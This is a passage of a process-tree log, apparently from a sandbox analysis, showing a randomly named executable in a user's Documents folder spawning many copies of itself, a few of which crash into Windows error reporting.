- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10864
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12000 -s 24
      4⤵
      PID:3732
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10120
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10304
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9456
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11764
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11768
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12404
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12608
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12844
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13156
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12112
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:5016
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13028
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12588
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11832
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13364
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13552
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13920
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 14240 -s 24
      4⤵
      PID:7048
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11944
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:2324
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12148
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14120
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14648
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15340
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 15340 -s 24
      4⤵
      PID:15120
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10392
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13232
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15380
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15708
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15984
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15476
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:6992
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:2284
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:13440
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14000
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:16464
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:16960
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17280
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:11008
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17452
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17732
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18036
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18320
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9472
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17908
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17992
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15824
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17520
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:16100
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:16528
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:16668
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18520
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18780
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19228
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:15036
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19344
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19644
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19940
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20224
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18676
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19596
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14092
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17260
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20332
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19724
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20396
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18756
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18176
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20424
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9272
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:16808
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19700
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17720
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20600
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20968
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21264
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20484
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21244
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21428
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21896
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:22272
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20000
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21860
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21920
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20656
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21920
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18300
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:22952
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23312
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19692
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23260
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18996
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:22572
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23308
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18684
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21248
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:708
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23040
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:22628
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23788
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:24060
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23576
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21660
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:24316
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20512
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19988
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21604
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 21604 -s 24
      4⤵
      PID:24972
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:24888
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25304
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:19240
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:23980
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25588
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14240
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25148
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:10080
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:17648
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:22988
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12852
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:24292
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:9500
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25680
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25940
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26284
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18340
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26016
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26452
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14524
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26140
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:24340
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26604
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14928
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18820
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25676
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26832
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:27164
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:27624
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:26680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 26680 -s 24
      4⤵
      PID:7240
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:14932
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:21828
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:28300
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18956
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:27780
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:27968
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:28432
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:25604
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:27812
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:28644
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:18480
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:27856
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:12756
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
    3⤵
    PID:20584
- - C:\Users\Admin\Documents\od8LFPdJTPowo4RmL2hBf8b0.exe
